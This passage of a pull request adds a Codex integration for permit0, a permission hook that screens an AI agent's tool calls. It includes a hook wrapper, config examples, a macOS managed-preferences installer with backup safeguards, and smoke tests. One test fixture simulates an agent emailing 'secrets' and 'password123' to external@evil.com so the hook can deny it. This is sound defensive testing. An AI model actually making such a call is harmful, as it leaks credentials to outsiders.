+    echo "ARGS=${HOOK_ARGS[*]}"
+} > "$INV_DIR/env"
+
+START_MS="$(python3 -c 'import time; print(int(time.time()*1000))')"
+cat > "$INV_DIR/stdin.json"
+
+"$PERMIT0" "${HOOK_ARGS[@]}" \
+    < "$INV_DIR/stdin.json" \
+    > "$INV_DIR/stdout" \
+    2> "$INV_DIR/stderr"
+EXIT=$?
+
+END_MS="$(python3 -c 'import time; print(int(time.time()*1000))')"
+DURATION_MS=$((END_MS - START_MS))
+
+STDIN_BYTES="$(wc -c < "$INV_DIR/stdin.json" | tr -d ' ')"
+STDOUT_BYTES="$(wc -c < "$INV_DIR/stdout" | tr -d ' ')"
+STDERR_BYTES="$(wc -c < "$INV_DIR/stderr" | tr -d ' ')"
+
+TOOL_NAME="$(python3 -c '
+import json, sys
+try:
+    print(json.load(open(sys.argv[1])).get("tool_name", "<none>"))
+except Exception as e:
+    print(f"<parse-error: {e}>")
+' "$INV_DIR/stdin.json" 2>/dev/null)"
+
+DECISION="$(python3 -c '
+import json, sys
+b = open(sys.argv[1]).read()
+if not b.strip():
+    print("EMPTY_STDOUT")
+else:
+    try:
+        d = json.loads(b)
+        print(d.get("hookSpecificOutput", {}).get("permissionDecision", "<missing>"))
+    except Exception as e:
+        print(f"<parse-error: {e}>")
+' "$INV_DIR/stdout" 2>/dev/null)"
+
+python3 - "$INV_ID" "$EXIT" "$DURATION_MS" "$STDIN_BYTES" "$STDOUT_BYTES" "$STDERR_BYTES" "$TOOL_NAME" "$DECISION" <<'PY' >> "$TRACE_DIR/events.log"
+import json
+import sys
+import time
+
+(
+    inv_id,
+    exit_code,
+    duration_ms,
+    stdin_bytes,
+    stdout_bytes,
+    stderr_bytes,
+    tool_name,
+    decision,
+) = sys.argv[1:]
+
+event = {
+    "ts": time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime()),
+    "kind": "hook_invocation",
+    "inv_id": inv_id,
+    "exit_code": int(exit_code),
+    "duration_ms": int(duration_ms),
+    "stdin_bytes": int(stdin_bytes),
+    "stdout_bytes": int(stdout_bytes),
+    "stderr_bytes": int(stderr_bytes),
+    "tool_name": tool_name,
+    "decision": decision,
+}
+print(json.dumps(event))
+PY
+
+cat "$INV_DIR/stdout"
+cat "$INV_DIR/stderr" >&2
+exit "$EXIT"

--- a/integrations/permit0-codex/examples/config.toml.example
+++ b/integrations/permit0-codex/examples/config.toml.example
@@ -1,0 +1,49 @@
+# permit0 hook for Codex — append this block to ~/.codex/config.toml
+#
+# Verified against Codex 0.130.0-alpha.5. Older Codex versions used
+# `codex_hooks = true`; the current name is `hooks = true`.
+#
+# After saving, launch `codex` interactively once and run /hooks to
+# mark this hook trusted. Future codex sessions (interactive and
+# `codex exec`) will then honor it.
+#
+# Replace `/abs/path/to/permit0` with the actual checkout path (the
+# `command` field does not expand `~` or shell vars).
+
+[features]
+hooks = true
+
+[[hooks.PreToolUse]]
+matcher = ".*"
+
+[[hooks.PreToolUse.hooks]]
+type = "command"
+command = "/abs/path/to/permit0/target/release/permit0 hook --client codex --packs-dir /abs/path/to/permit0/packs --unknown defer"
+timeout = 30
+statusMessage = "permit0 safety check"
+
+# ── Alternative configurations ─────────────────────────────────────
+
+# Restrict the hook to specific tool kinds (matcher is a regex applied
+# to tool_name and Codex's matcher aliases):
+#
+#   matcher = "^Bash$"                          # Bash only
+#   matcher = "^(Bash|apply_patch)$"            # Bash + file edits
+#   matcher = "^mcp__.*"                        # all MCP tools
+#   matcher = "^mcp__permit0-gmail__.*"         # one specific MCP server
+
+# Remote mode — point the hook at a running daemon instead of
+# evaluating in-process. Useful for centralized dashboards / audit:
+#
+#   command = "/abs/path/to/permit0 hook --client codex --remote http://127.0.0.1:9090 --unknown defer"
+#
+# Then in a separate process:
+#
+#   cargo run --release -p permit0-cli -- serve --ui --port 9090
+
+# Shadow mode — observe without blocking. permit0 logs the verdict to
+# stderr but never returns a deny envelope. Append --shadow:
+#
+#   command = "/abs/path/to/permit0 hook --client codex --shadow --unknown defer"
+#
+# Equivalently, set PERMIT0_SHADOW=1 in the environment that runs codex.

--- a/integrations/permit0-codex/examples/hooks.json.example
+++ b/integrations/permit0-codex/examples/hooks.json.example
@@ -1,0 +1,19 @@
+{
+  "_comment": "permit0 hook for Codex — alternative to inline [hooks] in config.toml. Save as ~/.codex/hooks.json. Replace /abs/path/to/permit0 with your actual checkout. After saving, launch codex once interactively and /hooks to mark it trusted.",
+
+  "hooks": {
+    "PreToolUse": [
+      {
+        "matcher": ".*",
+        "hooks": [
+          {
+            "type": "command",
+            "command": "/abs/path/to/permit0/target/release/permit0 hook --client codex --packs-dir /abs/path/to/permit0/packs --unknown defer",
+            "timeout": 30,
+            "statusMessage": "permit0 safety check"
+          }
+        ]
+      }
+    ]
+  }
+}

--- a/integrations/permit0-codex/examples/install-managed-prefs.sh
+++ b/integrations/permit0-codex/examples/install-managed-prefs.sh
@@ -1,0 +1,234 @@
+#!/usr/bin/env bash
+#
+# install-managed-prefs.sh — install (or remove) the permit0+Codex hook
+# in macOS managed preferences so Codex auto-trusts it.
+#
+# Codex's hook trust taxonomy treats values written to user defaults
+# under `com.openai.codex/requirements_toml_base64` as
+# `legacy_managed_config_mdm` — always trusted, no /hooks review needed.
+# This is the only unattended path on macOS that works without launching
+# Codex's TUI first.
+#
+# Usage:
+#   install-managed-prefs.sh [--force]       install (refuses if an
+#                                            unstamped value is already
+#                                            present)
+#   install-managed-prefs.sh --uninstall     remove permit0's value; if a
+#                                            backup exists, restore the
+#                                            most recent one
+#   install-managed-prefs.sh --help          show this help
+#
+# Safety model:
+#   • Before writing, we check whether `requirements_toml_base64` is
+#     already set.
+#   • If it's set and lacks our permit0 stamp comment, we refuse to
+#     overwrite without --force (an enterprise MDM may legitimately own
+#     that slot — we must not nuke it silently).
+#   • Every overwrite saves the prior decoded TOML to
+#     ~/.permit0/managed-prefs-backup-<YYYYMMDD-HHMMSS>.toml so recovery
+#     is always possible.
+#   • --uninstall restores the most recent backup by mtime.
+#
+# The stamp comment lives at the top of our written TOML:
+#   # permit0-managed: installed by integrations/permit0-codex
+# It survives because permit0's scripts round-trip the value via
+# `defaults read | base64 -d`, not through Codex's TOML parser. Codex's
+# parser strips it on load but never writes the value back to defaults,
+# so the stamp lives in our managed-preferences blob indefinitely.
+# DO NOT remove this stamp thinking it's dead — it is the ownership
+# marker.
+
+set -euo pipefail
+
+# ── Constants ───────────────────────────────────────────────────────
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+PERMIT0_BIN="$REPO_ROOT/target/release/permit0"
+PACKS_DIR="$REPO_ROOT/packs"
+
+DEFAULTS_DOMAIN="com.openai.codex"
+DEFAULTS_KEY="requirements_toml_base64"
+STAMP="# permit0-managed: installed by integrations/permit0-codex"
+BACKUP_DIR="$HOME/.permit0"
+
+# ── Help ────────────────────────────────────────────────────────────
+print_help() {
+    cat <<'EOF'
+install-managed-prefs.sh — install the permit0+Codex managed-prefs hook.
+
+USAGE:
+  install-managed-prefs.sh                    # install (refuses if unstamped)
+  install-managed-prefs.sh --force            # overwrite (backs up first)
+  install-managed-prefs.sh --uninstall        # remove permit0 value; restore last backup
+  install-managed-prefs.sh --uninstall --force  # remove any value (no stamp check)
+  install-managed-prefs.sh --help             # this message
+
+SAFETY:
+  This script writes to macOS user defaults at
+    com.openai.codex/requirements_toml_base64
+  which is the same slot enterprise MDMs use for Codex policy. By
+  default we REFUSE to overwrite a value we didn't install. Use
+  --force to override (a timestamped backup is always written first to
+  ~/.permit0/managed-prefs-backup-<TIMESTAMP>.toml).
+
+VERIFY:
+  defaults read com.openai.codex requirements_toml_base64 | base64 -d
+EOF
+}
+
+# ── Arg parsing ─────────────────────────────────────────────────────
+MODE=install
+FORCE=0
+for arg in "$@"; do
+    case "$arg" in
+        --uninstall)  MODE=uninstall ;;
+        --force)      FORCE=1 ;;
+        -h|--help)    print_help; exit 0 ;;
+        *)
+            echo "error: unknown flag: $arg" >&2
+            print_help
+            exit 2
+            ;;
+    esac
+done
+
+# ── Helpers ─────────────────────────────────────────────────────────
+read_current_decoded() {
+    if defaults read "$DEFAULTS_DOMAIN" "$DEFAULTS_KEY" >/dev/null 2>&1; then
+        defaults read "$DEFAULTS_DOMAIN" "$DEFAULTS_KEY" | base64 -d
+        return 0
+    fi
+    return 1
+}
+
+is_stamped() {
+    grep -qF "$STAMP" <<<"$1"
+}
+
+write_backup() {
+    local body="$1"
+    mkdir -p "$BACKUP_DIR"
+    local ts="$(date +%Y%m%d-%H%M%S)"
+    local path="$BACKUP_DIR/managed-prefs-backup-$ts.toml"
+    # Avoid stomping if two backups happen in the same second.
+    while [[ -e "$path" ]]; do
+        sleep 1
+        ts="$(date +%Y%m%d-%H%M%S)"
+        path="$BACKUP_DIR/managed-prefs-backup-$ts.toml"
+    done
+    printf '%s' "$body" > "$path"
+    echo "$path"
+}
+
+most_recent_backup() {
+    local match
+    match=$(ls -1t "$BACKUP_DIR"/managed-prefs-backup-*.toml 2>/dev/null | head -1)
+    [[ -n "$match" ]] && echo "$match"
+}
+
+permit0_toml_body() {
+    cat <<EOF
+$STAMP
+[features]
+hooks = true
+
+[[hooks.PreToolUse]]
+matcher = ".*"
+
+[[hooks.PreToolUse.hooks]]
+type = "command"
+command = "$PERMIT0_BIN hook --client codex --packs-dir $PACKS_DIR --unknown defer"
+timeout = 30
+statusMessage = "permit0 safety check"
+EOF
+}
+
+# ── Install path ────────────────────────────────────────────────────
+do_install() {
+    if [[ ! -x "$PERMIT0_BIN" ]]; then
+        echo "error: $PERMIT0_BIN not found or not executable" >&2
+        echo "       run: cd $REPO_ROOT && cargo build --release" >&2
+        exit 2
+    fi
+    if [[ ! -d "$PACKS_DIR" ]]; then
+        echo "error: $PACKS_DIR missing" >&2
+        exit 2
+    fi
+
+    local existing=""
+    if existing=$(read_current_decoded); then
+        if is_stamped "$existing"; then
+            echo "permit0 managed-prefs value already installed — re-installing."
+            local backup
+            backup=$(write_backup "$existing")
+            echo "  prior value backed up to: $backup"
+        else
+            if [[ "$FORCE" != "1" ]]; then
+                echo "error: an UNSTAMPED managed-prefs value is already set under" >&2
+                echo "       $DEFAULTS_DOMAIN/$DEFAULTS_KEY." >&2
+                echo "       Refusing to overwrite — this may be your enterprise MDM's" >&2
+                echo "       Codex policy. Re-run with --force to back it up and replace." >&2
+                echo "       First 5 lines of the existing value:" >&2
+                printf '%s\n' "$existing" | head -5 | sed 's/^/         | /' >&2
+                exit 2
+            fi
+            echo "WARNING: overwriting unstamped existing value (--force given)."
+            local backup
+            backup=$(write_backup "$existing")
+            echo "  prior value backed up to: $backup"
+        fi
+    fi
+
+    local body
+    body=$(permit0_toml_body)
+    defaults write "$DEFAULTS_DOMAIN" "$DEFAULTS_KEY" -string "$(printf '%s' "$body" | base64)"
+
+    echo "✓ permit0 managed-prefs installed."
+    echo
+    cat <<EOF
+Verify:
+  defaults read $DEFAULTS_DOMAIN $DEFAULTS_KEY | base64 -d
+
+Uninstall (and restore the most recent backup if any):
+  $0 --uninstall
+EOF
+}
+
+# ── Uninstall path ──────────────────────────────────────────────────
+do_uninstall() {
+    local existing=""
+    if ! existing=$(read_current_decoded); then
+        echo "(already absent — nothing to do)"
+        exit 0
+    fi
+
+    if ! is_stamped "$existing"; then
+        if [[ "$FORCE" != "1" ]]; then
+            echo "error: managed-prefs value present but NOT stamped by permit0." >&2
+            echo "       Refusing to delete. Re-run with --force to remove anyway." >&2
+            echo "       First 5 lines:" >&2
+            printf '%s\n' "$existing" | head -5 | sed 's/^/         | /' >&2
+            exit 2
+        fi
+        echo "WARNING: deleting unstamped value (--force given)."
+    fi
+
+    defaults delete "$DEFAULTS_DOMAIN" "$DEFAULTS_KEY"
+    echo "✓ removed managed-prefs value."
+
+    local restore
+    if restore=$(most_recent_backup); then
+        local restored_body
+        restored_body=$(cat "$restore")
+        defaults write "$DEFAULTS_DOMAIN" "$DEFAULTS_KEY" \
+            -string "$(printf '%s' "$restored_body" | base64)"
+        echo "✓ restored most recent backup: $restore"
+    else
+        echo "  (no backup found in $BACKUP_DIR — nothing to restore)"
+    fi
+}
+
+case "$MODE" in
+    install)   do_install ;;
+    uninstall) do_uninstall ;;
+esac

--- a/scripts/test-codex-hook.sh
+++ b/scripts/test-codex-hook.sh
@@ -1,0 +1,186 @@
+#!/usr/bin/env bash
+#
+# Manual smoke test for `permit0 hook --client codex`.
+#
+# Pipes Codex-shaped PreToolUse JSON into the hook binary and checks the
+# stdout shape + exit code against Codex's contract:
+#
+#   - Empty stdout      = "no objection" (tool runs)
+#   - Deny envelope     = tool blocked
+#   - Anything else     = Codex fails open with a warning
+#
+# This script does NOT require Codex installed. It exercises the same
+# process boundary the integration tests in tests/cli_tests.rs cover,
+# but in a way you can eyeball during development and copy-paste output
+# into a bug report. For the actual Codex end-to-end test, see
+# docs/plans/codex-integration/03-configuration.md.
+#
+# Usage:
+#   ./scripts/test-codex-hook.sh                    # uses ./target/release/permit0
+#   PERMIT0=/path/to/permit0 ./scripts/test-codex-hook.sh
+#
+# Exits 0 if every case meets its expected shape, non-zero otherwise.
+
+set -euo pipefail
+
+PERMIT0="${PERMIT0:-./target/release/permit0}"
+
+if [[ ! -x "$PERMIT0" ]]; then
+    echo "error: $PERMIT0 not found or not executable" >&2
+    echo "       build with: cargo build --release" >&2
+    exit 2
+fi
+
+PASS=0
+FAIL=0
+
+# ----------------------------------------------------------------------
+# run_case <name> <hook-args...> -- <expected-shape> -- <stdin-json>
+#
+# expected-shape ∈ { empty, deny, any }
+#   empty: stdout must be zero bytes (allow / defer / shadow)
+#   deny:  stdout must parse as JSON with permissionDecision = "deny"
+#   any:   stdout may be anything (rare; used for fuzz cases)
+# ----------------------------------------------------------------------
+run_case() {
+    local name="$1"; shift
+    local args=()
+    while [[ "${1:-}" != "--" ]]; do args+=("$1"); shift; done
+    shift
+    local expected="$1"; shift
+    [[ "$1" == "--" ]] && shift
+    local stdin="$1"
+
+    echo "── $name"
+    echo "   command: $PERMIT0 hook ${args[*]}"
+
+    local stdout stderr exit_code
+    stdout=$(echo -n "$stdin" | "$PERMIT0" hook "${args[@]}" 2>/tmp/permit0_stderr.$$) || exit_code=$?
+    exit_code="${exit_code:-0}"
+    stderr=$(cat /tmp/permit0_stderr.$$)
+    rm -f /tmp/permit0_stderr.$$
+
+    echo "   exit=$exit_code stdout=${#stdout}B"
+    [[ -n "$stderr" ]] && echo "   stderr: $stderr" | head -c 400 && echo
+
+    case "$expected" in
+        empty)
+            if [[ -z "$stdout" && "$exit_code" -eq 0 ]]; then
+                echo "   ✓ PASS (empty stdout, exit 0)"
+                PASS=$((PASS+1))
+            else
+                echo "   ✗ FAIL: expected empty stdout + exit 0, got ${#stdout}B + exit $exit_code"
+                echo "     stdout: $stdout"
+                FAIL=$((FAIL+1))
+            fi
+            ;;
+        deny)
+            if [[ "$exit_code" -eq 0 ]]; then
+                local decision
+                decision=$(echo "$stdout" | python3 -c \
+                    'import json,sys; print(json.load(sys.stdin)["hookSpecificOutput"]["permissionDecision"])' \
+                    2>/dev/null || echo "<parse-error>")
+                if [[ "$decision" == "deny" ]]; then
+                    echo "   ✓ PASS (deny envelope, exit 0)"
+                    PASS=$((PASS+1))
+                else
+                    echo "   ✗ FAIL: expected permissionDecision=deny, got $decision"
+                    echo "     stdout: $stdout"
+                    FAIL=$((FAIL+1))
+                fi
+            elif [[ "$exit_code" -eq 2 ]]; then
+                echo "   ✓ PASS (exit 2 — Codex treats as block)"
+                PASS=$((PASS+1))
+            else
+                echo "   ✗ FAIL: expected deny envelope or exit 2, got exit $exit_code"
+                echo "     stdout: $stdout"
+                FAIL=$((FAIL+1))
+            fi
+            ;;
+        any)
+            echo "   ✓ PASS (any output accepted)"
+            PASS=$((PASS+1))
+            ;;
+    esac
+    echo
+}
+
+# ----------------------------------------------------------------------
+# Canned Codex stdin payloads.
+# ----------------------------------------------------------------------
+CODEX_BASE_FIELDS='"session_id":"test-session","transcript_path":"/tmp/x.jsonl","cwd":"/tmp","hook_event_name":"PreToolUse","model":"gpt-5.4","turn_id":"t1","tool_use_id":"c1"'
+
+CODEX_UNKNOWN_TOOL='{'"$CODEX_BASE_FIELDS"',"tool_name":"completely_unknown_widget","tool_input":{}}'
+
+CODEX_GMAIL_SEND_EXTERNAL='{'"$CODEX_BASE_FIELDS"',"tool_name":"mcp__permit0-gmail__gmail_send","tool_input":{"to":"external@evil.com","subject":"secrets","body":"password123"}}'
+
+CODEX_GMAIL_READ='{'"$CODEX_BASE_FIELDS"',"tool_name":"mcp__permit0-gmail__gmail_read","tool_input":{"message_id":"abc123"}}'
+
+CODEX_BASH_LS='{'"$CODEX_BASE_FIELDS"',"tool_name":"Bash","tool_input":{"command":"ls -la"}}'
+
+CLAUDE_MINIMAL='{"tool_name":"completely_unknown_widget","tool_input":{}}'
+
+# ----------------------------------------------------------------------
+# Test cases.
+# ----------------------------------------------------------------------
+
+echo "═══ permit0 Codex hook smoke tests ═══"
+echo "Binary: $PERMIT0"
+echo
+
+run_case "unknown tool + --unknown defer (empty stdout = no objection)" \
+    --client codex --unknown defer \
+    -- empty \
+    -- "$CODEX_UNKNOWN_TOOL"
+
+run_case "unknown tool + --unknown deny (deny envelope)" \
+    --client codex --unknown deny \
+    -- deny \
+    -- "$CODEX_UNKNOWN_TOOL"
+
+run_case "Gmail send to external (expect deny / HITL→deny)" \
+    --client codex --unknown defer \
+    -- deny \
+    -- "$CODEX_GMAIL_SEND_EXTERNAL"
+
+run_case "shadow mode (must be empty stdout regardless of verdict)" \
+    --client codex --shadow --unknown defer \
+    -- empty \
+    -- "$CODEX_GMAIL_SEND_EXTERNAL"
+
+run_case "Claude-shaped minimal payload under --client codex (back-compat)" \
+    --client codex --unknown defer \
+    -- empty \
+    -- "$CLAUDE_MINIMAL"
+
+run_case "malformed stdin (fail-closed: deny envelope or exit 2)" \
+    --client codex \
+    -- deny \
+    -- "not valid json"
+
+run_case "empty stdin (fail-closed: deny envelope or exit 2)" \
+    --client codex \
+    -- deny \
+    -- ""
+
+run_case "remote daemon unreachable (fail-closed: deny envelope)" \
+    --client codex --remote http://127.0.0.1:1 \
+    -- deny \
+    -- "$CODEX_GMAIL_READ"
+
+run_case "Bash command (depends on packs; structurally must be valid)" \
+    --client codex --unknown defer \
+    -- any \
+    -- "$CODEX_BASH_LS"
+
+# ----------------------------------------------------------------------
+# Summary.
+# ----------------------------------------------------------------------
+echo "═══ Summary ═══"
+echo "  passed: $PASS"
+echo "  failed: $FAIL"
+echo
+
+if [[ "$FAIL" -ne 0 ]]; then
+    exit 1
+fi

--- a/scripts/test-managed-prefs-roundtrip.sh
+++ b/scripts/test-managed-prefs-roundtrip.sh
@@ -1,0 +1,231 @@
+#!/usr/bin/env bash
+#
+# test-managed-prefs-roundtrip.sh — integration test for
+# integrations/permit0-codex/examples/install-managed-prefs.sh.
+#
+# Mutates the real macOS user defaults under
+# `com.openai.codex/requirements_toml_base64`, so the test snapshots the
+# live value at startup and restores it on EXIT (success or failure)
+# via a trap. Never destroys developer state.
+#
+# Test phases:
+#   A. Without --force, refuse to clobber an unstamped existing value.
+#   B. With --force, back up the prior value and install permit0's.
+#   C. --uninstall restores the most recent backup.
+#   D. --uninstall on an unstamped value refuses without --force.
+#
+# Skips gracefully on non-macOS (CI on Linux).
+
+set -uo pipefail
+
+REPO_ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+INSTALLER="$REPO_ROOT/integrations/permit0-codex/examples/install-managed-prefs.sh"
+
+DOMAIN=com.openai.codex
+KEY=requirements_toml_base64
+BACKUP_DIR="$HOME/.permit0"
+STAMP="# permit0-managed: installed by integrations/permit0-codex"
+
+PASS=0
+FAIL=0
+
+# ── Skip on non-macOS ───────────────────────────────────────────────
+if [[ "$(uname -s)" != "Darwin" ]]; then
+    echo "test-managed-prefs-roundtrip: skipped (requires macOS \`defaults\`)"
+    exit 0
+fi
+if [[ ! -x "$INSTALLER" ]]; then
+    echo "test-managed-prefs-roundtrip: skipped (installer missing or not executable: $INSTALLER)"
+    exit 0
+fi
+
+# ── Snapshot + restore-on-exit ──────────────────────────────────────
+PRESERVED_PATH="/tmp/permit0-mp-test-preserved-$$.b64"
+PRESERVED_BACKUPS_DIR="/tmp/permit0-mp-test-preserved-backups-$$"
+HAD_VALUE=0
+HAD_BACKUPS=0
+
+if defaults read "$DOMAIN" "$KEY" >/dev/null 2>&1; then
+    defaults read "$DOMAIN" "$KEY" > "$PRESERVED_PATH"
+    HAD_VALUE=1
+fi
+if compgen -G "$BACKUP_DIR/managed-prefs-backup-*.toml" >/dev/null 2>&1; then
+    mkdir -p "$PRESERVED_BACKUPS_DIR"
+    mv "$BACKUP_DIR"/managed-prefs-backup-*.toml "$PRESERVED_BACKUPS_DIR/"
+    HAD_BACKUPS=1
+fi
+
+restore_state() {
+    # Always remove anything the test left behind first.
+    defaults delete "$DOMAIN" "$KEY" >/dev/null 2>&1 || true
+    rm -f "$BACKUP_DIR"/managed-prefs-backup-*.toml 2>/dev/null || true
+    # Put the developer's pre-test state back.
+    if [[ "$HAD_VALUE" == "1" && -f "$PRESERVED_PATH" ]]; then
+        defaults write "$DOMAIN" "$KEY" -string "$(cat "$PRESERVED_PATH")" \
+            >/dev/null 2>&1 || true
+    fi
+    rm -f "$PRESERVED_PATH" 2>/dev/null
+    if [[ "$HAD_BACKUPS" == "1" && -d "$PRESERVED_BACKUPS_DIR" ]]; then
+        mv "$PRESERVED_BACKUPS_DIR"/managed-prefs-backup-*.toml \
+            "$BACKUP_DIR/" 2>/dev/null || true
+        rmdir "$PRESERVED_BACKUPS_DIR" 2>/dev/null || true
+    fi
+}
+trap restore_state EXIT
+
+# ── Test helpers ────────────────────────────────────────────────────
+say() { printf '%s\n' "$*"; }
+
+assert_pass() {
+    PASS=$((PASS + 1))
+    say "  ✓ $1"
+}
+
+assert_fail() {
+    FAIL=$((FAIL + 1))
+    say "  ✗ $1"
+}
+
+assert_exit_neq_zero() {
+    local label="$1"
+    local code="$2"
+    if [[ "$code" != "0" ]]; then
+        assert_pass "$label (exit=$code)"
+    else
+        assert_fail "$label (expected non-zero exit, got 0)"
+    fi
+}
+
+assert_exit_zero() {
+    local label="$1"
+    local code="$2"
+    if [[ "$code" == "0" ]]; then
+        assert_pass "$label (exit=0)"
+    else
+        assert_fail "$label (expected exit 0, got $code)"
+    fi
+}
+
+current_value_decoded() {
+    if defaults read "$DOMAIN" "$KEY" >/dev/null 2>&1; then
+        defaults read "$DOMAIN" "$KEY" | base64 -d
+    fi
+}
+
+plant_sentinel() {
+    local sentinel="# fake-mdm-sentinel-do-not-overwrite
+[features]
+hooks = false
+"
+    defaults write "$DOMAIN" "$KEY" -string "$(printf '%s' "$sentinel" | base64)"
+    printf '%s' "$sentinel"
+}
+
+# ── Fresh-start the test state ──────────────────────────────────────
+defaults delete "$DOMAIN" "$KEY" >/dev/null 2>&1 || true
+rm -f "$BACKUP_DIR"/managed-prefs-backup-*.toml 2>/dev/null || true
+
+# ──────────────────────────────────────────────────────────────────
+#   Phase A: refuse to clobber an unstamped existing value
+# ──────────────────────────────────────────────────────────────────
+say
+say "Phase A: refuse to clobber unstamped existing value"
+SENTINEL="$(plant_sentinel)"
+
+set +e
+INSTALL_OUTPUT="$("$INSTALLER" 2>&1)"
+CODE=$?
+set -e
+assert_exit_neq_zero "installer without --force exits non-zero" "$CODE"
+
+if grep -qiE "(unstamped|stamp|--force)" <<<"$INSTALL_OUTPUT"; then
+    assert_pass "warning mentions stamp/--force"
+else
+    assert_fail "warning should mention stamp/--force; got: $(head -3 <<<"$INSTALL_OUTPUT")"
+fi
+
+if [[ "$(current_value_decoded)" == "$SENTINEL" ]]; then
+    assert_pass "sentinel value unchanged after failed install"
+else
+    assert_fail "sentinel value was modified by failed install"
+fi
+
+# ──────────────────────────────────────────────────────────────────
+#   Phase B: --force backs up + overwrites
+# ──────────────────────────────────────────────────────────────────
+say
+say "Phase B: --force backs up and overwrites"
+set +e
+FORCE_OUTPUT="$("$INSTALLER" --force 2>&1)"
+CODE=$?
+set -e
+assert_exit_zero "installer --force succeeds" "$CODE"
+
+# Find the new backup.
+LATEST_BACKUP="$(ls -1t "$BACKUP_DIR"/managed-prefs-backup-*.toml 2>/dev/null | head -1)"
+if [[ -n "$LATEST_BACKUP" && -f "$LATEST_BACKUP" ]]; then
+    assert_pass "backup file created at $(basename "$LATEST_BACKUP")"
+    if [[ "$(cat "$LATEST_BACKUP")" == "$SENTINEL" ]]; then
+        assert_pass "backup content matches the pre-install sentinel"
+    else
+        assert_fail "backup content does not match sentinel"
+    fi
+else
+    assert_fail "no backup file found in $BACKUP_DIR"
+fi
+
+NEW_VAL="$(current_value_decoded)"
+if grep -qF "$STAMP" <<<"$NEW_VAL"; then
+    assert_pass "new value contains permit0 stamp"
+else
+    assert_fail "new value missing permit0 stamp marker"
+fi
+
+# ──────────────────────────────────────────────────────────────────
+#   Phase C: --uninstall restores backup
+# ──────────────────────────────────────────────────────────────────
+say
+say "Phase C: --uninstall restores the most recent backup"
+set +e
+UNINSTALL_OUTPUT="$("$INSTALLER" --uninstall 2>&1)"
+CODE=$?
+set -e
+assert_exit_zero "installer --uninstall succeeds" "$CODE"
+
+RESTORED="$(current_value_decoded)"
+if [[ "$RESTORED" == "$SENTINEL" ]]; then
+    assert_pass "current value matches the sentinel after restore"
+else
+    assert_fail "restore did not match sentinel"
+fi
+
+# ──────────────────────────────────────────────────────────────────
+#   Phase D: --uninstall on unstamped value refuses
+# ──────────────────────────────────────────────────────────────────
+say
+say "Phase D: --uninstall on unstamped value refuses without --force"
+
+# Sentinel is still in place from Phase C. Remove the backup we left
+# behind so --uninstall can't quietly restore it after a refuse.
+rm -f "$BACKUP_DIR"/managed-prefs-backup-*.toml 2>/dev/null || true
+
+set +e
+REFUSE_OUTPUT="$("$INSTALLER" --uninstall 2>&1)"
+CODE=$?
+set -e
+assert_exit_neq_zero "--uninstall on unstamped value exits non-zero" "$CODE"
+
+if [[ "$(current_value_decoded)" == "$SENTINEL" ]]; then
+    assert_pass "sentinel value preserved after refused --uninstall"
+else
+    assert_fail "sentinel value was modified by refused --uninstall"
+fi
+
+# ──────────────────────────────────────────────────────────────────
+#   Summary
+# ──────────────────────────────────────────────────────────────────
+say
+say "═══ Summary ═══"
+say "  passed: $PASS"
+say "  failed: $FAIL"
+[[ "$FAIL" == "0" ]]


### PR DESCRIPTION
Stacked on top of #50 (the planning docs). Once #50 lands on \`main\`, the base of this PR becomes \`main\`.

## Summary

Implements the Codex CLI integration described in the planning docs in #50. Three logical commits:

1. **\`feat(hook):\` add Codex client kind and output format to permit0 hook adapter** — implements \`--client codex\` for the \`permit0 hook\` subcommand: empty stdout = allow/defer, JSON deny envelope for Deny/HITL, fail-closed on any internal error. 7 new integration tests cover all wire shapes including the fail-closed paths.

2. **\`feat(integrations):\` add \`permit0-codex\` with examples, demo rig, and safe managed-prefs installer** — user-facing home for the integration at \`integrations/permit0-codex/\`. Three artifacts: paste-ready \`examples/\` (TOML, JSON, macOS installer), a runnable \`dev-test-rig/\` (instrumented hook wrapper, mock-gmail MCP server, demo launcher, live event watcher), and corresponding README walkthroughs.

3. **\`docs(codex):\` add packaging plan and post-implementation reviews** — \`07-packaging.md\` scoping the safety hardening, plus reviews \`9be273b5/\` and \`a7ebc31f/07-08-*\` that drove it.

## What this changes for end users

| Before this PR | After this PR |
|---|---|
| No way to gate Codex tool calls via permit0 | \`permit0 hook --client codex\` is a first-class option |
| No setup recipe | Copy-paste \`config.toml\` snippet or run \`install-managed-prefs.sh\` |
| No reproducible demo | \`bash integrations/permit0-codex/dev-test-rig/codex-demo\` opens a full live demo with mock MCP |

## Safety story (why commit 2 looks longer than it needs to)

The macOS installer writes to \`com.openai.codex/requirements_toml_base64\` — the same defaults key an enterprise MDM uses to manage Codex policy. A naive installer would silently overwrite an org's managed config the moment anyone ran the demo. This PR ships the hardened version from day one:

- Every write stamps the TOML body with \`# permit0-managed: installed by integrations/permit0-codex\`.
- The installer refuses to overwrite an unstamped value unless \`--force\` is passed, and writes a timestamped backup to \`~/.permit0/managed-prefs-backup-<TS>.toml\` before any overwrite.
- \`--uninstall\` restores the most recent backup by mtime.
- \`dev-test-rig/cleanup\` checks the same stamp before deleting; the demo launcher itself refuses to install over a non-permit0 value.

## End-to-end verification

Manual run against Codex 0.130.0-alpha.5 on macOS (transcript in \`docs/plans/codex-integration/06-real-codex-testing.md\`):

- ✅ \`codex exec\` with a Bash prompt fires the hook, permit0 defers (no Bash pack), Codex runs the command. Round-trip: 65ms.
- ✅ \`codex exec\` asking for a gmail send to an external recipient fires the hook, permit0's Gmail pack scores it Medium (HITL), Codex receives a deny envelope and refuses the MCP call. The mock MCP server's log confirms \`tools/call\` was never reached — permit0 stopped the chain at \`PreToolUse\`.
- ✅ The hook hot path stays under 100ms end-to-end.

Live-fire diagnostics (per-invocation \`stdin.json\`/\`stdout\`/\`stderr\` plus a JSONL \`events.log\`) are written under \`/tmp/permit0-codex-test/\` so a reviewer can reproduce any decision after the fact.

## Test plan

- [x] \`cargo fmt --all --check\` clean
- [x] \`cargo clippy --all-targets -- -D warnings\` clean
- [x] \`cargo test --workspace --exclude permit0-py\` — 640 tests pass across 15 binaries
- [x] \`scripts/test-codex-hook.sh\` — 9/9 synthetic scenarios pass
- [x] \`scripts/test-managed-prefs-roundtrip.sh\` — 11/11 assertions across 4 phases pass (skips gracefully on Linux)
- [x] Live \`codex exec\` smoke from a clean \`CODEX_HOME\`: hook fires for Bash, denies gmail-to-external
